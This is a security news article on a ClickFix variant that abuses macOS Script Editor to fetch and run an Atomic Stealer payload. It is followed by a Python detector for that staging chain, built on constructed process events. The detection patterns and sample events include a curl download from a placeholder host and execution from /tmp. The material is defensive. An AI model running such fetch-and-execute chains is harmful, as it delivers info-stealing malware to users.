New ClickFix variant bypasses Apple safeguards with one-click script execution

The researchers found that the behavior of Script Editor may vary depending on the macOS version. “On recent versions of macOS Tahoe, an additional warning prompt is introduced, requiring the user to allow the script to be saved to disk before execution,” they said.

Lightweight staging for Atomic Stealer

Once executed, the AppleScript resolves to an obfuscated shell command. That command decodes a hidden URL, retrieves a remote payload using ‘curl’, and executes it via ‘zsh’. From here, standard info-stealing takes over: a ‘Mach-O’ binary is written to a temporary location, its attributes are adjusted, its permissions are set, and execution is triggered.

This binary is a new variant of the Atomic Stealer.

The researchers noted that the staging approach keeps the initial script minimal and less detectable, while the actual malicious logic arrives separately. It’s modular, quick to update, and harder to catch at the first stage.
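Because the first-stage script is kept minimal, the process tree it creates is the more reliable thing to detect. The following is an added example, not code from the researchers or the article: it correlates process-creation events under a script host and flags a subtree that both downloads something and runs a file from a temporary path. The event format, the process names, the temp paths and the `base64`/`xattr`/`chmod` patterns are assumptions; all sample events are constructed.

```python
import re
TMP = r"(/tmp/|/private/tmp/|/var/folders/)"  # assumed temporary locations
# Only curl, zsh and a temp location are on the page; base64/xattr/chmod are assumed.
STAGES = {
    "decode":   re.compile(r"\bbase64\b.*\s(-d|-D|--decode)\b"),
    "fetch":    re.compile(r"\bcurl\b"),
    "attrs":    re.compile(r"\bxattr\b.*" + TMP),
    "perms":    re.compile(r"\bchmod\b.*\+x.*" + TMP),
    "tmp_exec": re.compile(r"^" + TMP + r"\S+"),
}
SCRIPT_HOSTS = {"Script Editor", "osascript"}  # assumed process names
REQUIRED = {"fetch", "tmp_exec"}  # download plus execution from a temp path

def descends_from(pid, root, parent):
    """Walk the parent map upward; True if root is an ancestor of pid."""
    seen = set()
    while pid in parent and pid not in seen:
        seen.add(pid)
        pid = parent[pid]
        if pid == root:
            return True
    return False

def find_staging_chains(events):
    """Return (root_pid, stages_seen) for each script host with a staging subtree."""
    parent = {e["pid"]: e["ppid"] for e in events}
    findings = []
    for root in (e for e in events if e["name"] in SCRIPT_HOSTS):
        hits = set()
        for e in events:
            if descends_from(e["pid"], root["pid"], parent):
                hits |= {s for s, rx in STAGES.items() if rx.search(e["cmd"])}
        if REQUIRED <= hits:
            findings.append((root["pid"], sorted(hits)))
    return findings

# Constructed process-creation events (pid, ppid, name, cmd); not real telemetry.
SAMPLE = [dict(zip(("pid", "ppid", "name", "cmd"), row)) for row in [
    (100, 1, "Script Editor", "Script Editor"),
    (101, 100, "sh", "sh -c <obfuscated command>"),
    (102, 101, "base64", "base64 -d"),
    (103, 101, "curl", "curl -fsSL https://payload.example.invalid/stage2"),
    (104, 101, "zsh", "zsh"),
    (105, 104, "xattr", "xattr -c /tmp/helper_sample"),
    (106, 104, "chmod", "chmod +x /tmp/helper_sample"),
    (107, 104, "helper_sample", "/tmp/helper_sample"),
    (200, 1, "Script Editor", "Script Editor"),
    (201, 200, "curl", "curl -O https://docs.example.invalid/readme.txt"),
]]
```

Calling `find_staging_chains(SAMPLE)` reports the subtree under pid 100 with all five stages, while the Script Editor instance at pid 200, which only downloads a file, is not flagged.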
